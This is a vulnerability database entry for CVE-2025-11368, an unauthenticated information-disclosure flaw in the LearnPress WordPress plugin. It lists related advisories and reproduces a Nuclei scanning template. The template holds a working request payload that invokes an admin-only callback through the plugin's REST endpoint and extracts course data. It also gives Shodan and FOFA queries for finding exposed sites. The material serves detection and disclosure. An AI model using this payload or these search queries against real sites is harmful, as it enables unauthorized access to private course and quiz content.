LearnPress < 4.3.0 - Arbitrary Callback Execution to Information Exposure

🗓️ 23 Jun 2026 05:08:33Reported by ProjectDiscoveryType

LearnPress up to 4.2.9.4 exposes admin content via rest endpoint load_content_via_ajax to unauthenticated users.

Reporter	Title	Published	Views	Family All 13
Circl	CVE-2025-11368	7 Feb 202620:59	–	circl
CNNVD	WordPress plugin LearnPress 信息泄露漏洞	21 Nov 202500:00	–	cnnvd
CNVD	WordPress Plugin LearnPress Information Disclosure Vulnerability	25 Nov 202500:00	–	cnvd
CVE	CVE-2025-11368	21 Nov 202505:32	–	cve
Cvelist	CVE-2025-11368 LearnPress – WordPress LMS Plugin <= 4.2.9.4 - Missing Authorization to Unauthenticated Arbitrary Callback Execution to Information Exposure	21 Nov 202505:32	–	cvelist
EUVD	EUVD-2025-198382	21 Nov 202505:32	–	euvd
NVD	CVE-2025-11368	21 Nov 202506:15	–	nvd
Patchstack	WordPress LearnPress plugin <= 4.2.9.4 - Missing Authorization to Unauthenticated Arbitrary Callback Execution to Information Exposure vulnerability	21 Nov 202508:26	–	patchstack
Positive Technologies	PT-2025-47660	21 Nov 202500:00	–	ptsecurity
RedhatCVE	CVE-2025-11368	22 Nov 202505:35	–	redhatcve

Source	Link
wpscan	www.wpscan.com/vulnerability/5c40d803-87b3-437b-b514-1e85b43371a0/

id: CVE-2025-11368

info:
  name: LearnPress < 4.3.0 - Arbitrary Callback Execution to Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs.
  impact: |
    Unauthenticated attackers can access sensitive admin curriculum, quiz answers, and course materials, compromising educational content confidentiality.
  remediation: Update to the latest version beyond 4.2.9.4.
  reference:
    - https://wpscan.com/vulnerability/5c40d803-87b3-437b-b514-1e85b43371a0/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-11368
    epss-score: 0.00914
    epss-percentile: 0.55405
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2025,wordpress,wp-scan,wp-plugin,wp-scan,learnpress,vkev

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-json/lp/v1/load_content_via_ajax"

    headers:
      Content-Type: application/json

    body: '{"callback":{"class":"LearnPress\\TemplateHooks\\Course\\ListCoursesTemplate","method":"render_courses"},"args":{}}'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status":"success"'

      - type: word
        part: body
        words:
          - 'course-item'
          - 'course-title'
          - 'course-permalink'
          - 'learn-press-courses'
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: course_title
        part: body
        regex:
          - "course-title['\"]>([^<]+)<"
        group: 1

      - type: regex
        name: course_count
        part: body
        regex:
          - 'course-count-lesson[^>]*>([^<]+)<'
        group: 1
# digest: 4a0a00473045022071170303ddc775ba624d05b8525853634bf1b706fd389547bc25f01dfcfeb6ae022100d188432436d61c8ef6d1658195e9783eb334b443de8fd5411eb0a6cbd3cee61f:922c64590222798bb761d5b6d8e72950

07 Feb 2026 20:59Current

6.1Medium risk

Vulners AI Score6.1

CVSS 3.15.3

EPSS0.00914

SSVC